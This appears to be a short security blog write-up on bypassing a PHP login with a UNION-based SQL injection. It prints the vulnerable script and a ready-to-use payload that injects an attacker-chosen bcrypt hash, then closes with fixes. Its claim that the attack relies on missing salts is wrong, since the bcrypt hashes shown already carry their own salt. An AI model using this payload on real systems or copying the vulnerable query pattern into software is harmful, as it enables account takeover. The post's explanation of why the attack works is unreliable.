Open in app

Sign in

Write

Sign in

SQL Injection Bypass Login Password Protection

Bengsky
2 min readJul 28, 2023

--

Introduction:

In this write-up, we will explore a method to bypass login password protection using SQL injection. We will analyze a PHP-based login script that separates the username and password checks in the SQL query, making the traditional ‘ OR 1=1-- payload ineffective. Instead, we will employ an alternative approach to achieve the desired result.

Objective:

The objective is to gain unauthorized access to a user’s account by exploiting a vulnerability in the login system.

The Login Script:

The login script provided below is used to authenticate users against a database. It uses mysqli to establish a connection and password_verify to check the user’s input password against the stored hashed password.

$conn = new mysqli($hostname, $username, $password, $database);
$username = $_POST['username'];
$password = $_POST['password'];
$sql = "SELECT * FROM users WHERE username = '$username'";
$result = $conn->query($sql);

if ($result->num_rows == 1) {
    $row = $result->fetch_assoc();
    if (password_verify($password, $row['password'])) {
        session_start();
        $_SESSION['username'] = $username;
        header('Location: dashboard.php');
    } else {
        echo "Invalid password. Please try again.";
    }
} else {
    echo "User not found. Please check your credentials.";
}

$conn->close();

Exploiting the Vulnerability:

Identifying Usernames:

The first step in bypassing the login is to identify a valid username.

We can use a SQL injection technique as no salt is used in the password hashing. By specifying a particular hashed password, for example: $2a$12$fW9ApWl1h67Wm/c.TxPdAenEQYdUVzk2ziAZD1jMTDpHRxqFDS49u for the password P@ssw0rd we can craft the following SQL injection payload in the username field:

random string' UNION SELECT '{username}','$2a$12$fW9ApWl1h67Wm/c.TxPdAenEQYdUVzk2ziAZD1jMTDpHRxqFDS49u' LIMIT 1 --

This will result in the following query execution:

SELECT * FROM users WHERE username = 'random string' UNION SELECT '{username}','$2a$12$fW9ApWl1h67Wm/c.TxPdAenEQYdUVzk2ziAZD1jMTDpHRxqFDS49u' LIMIT 1 --

Since WHERE username = ’random string’ does not return any results, the UNION SELECT part will execute and fetch the record containing the desired username and hashed password, like so:

username|password
admin|$2a$12$fW9ApWl1h67Wm/c.TxPdAenEQYdUVzk2ziAZD1jMTDpHRxqFDS49u

With the obtained username and hashed password, the following code will authenticate successfully, granting unauthorized access to the target account:

if (password_verify('P@ssw0rd', '$2a$12$fW9ApWl1h67Wm/c.TxPdAenEQYdUVzk2ziAZD1jMTDpHRxqFDS49u'))

Conclusion

By exploiting the SQL injection vulnerability in the provided login script and skillfully constructing the payload, we successfully bypassed the login password protection and gained unauthorized access to the user’s account. It is essential to promptly address such security flaws by implementing proper input validation, using prepared statements, and employing strong password hashing mechanisms with salts to protect against potential attacks.

--

--

Bengsky

Written by Bengsky

0 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams